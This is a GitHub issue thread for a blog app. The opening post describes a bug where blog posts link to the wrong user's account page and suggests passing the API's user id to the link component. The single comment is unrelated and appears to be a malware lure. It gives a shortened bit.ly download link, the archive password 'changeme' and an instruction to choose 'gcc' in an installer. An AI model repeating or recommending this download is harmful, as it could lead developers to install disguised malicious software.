### ISSUE TITLE
Blogs and Accounts

### ISSUE THREAD

**Issue by a-box31** [a-box31/ABlog#1]
Currently there is a problem where Blogs lead to the wrong account page. The account page is fixed to only pull up the users account information but can not pull up other peoples account information. 

To fix this, one needs to fix the client side logic to use the params given by the api call of getting the blogs. The api call contains the user id that needs to be used to render the link component to the account page. The account information will then be accessed via api calls to the server.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
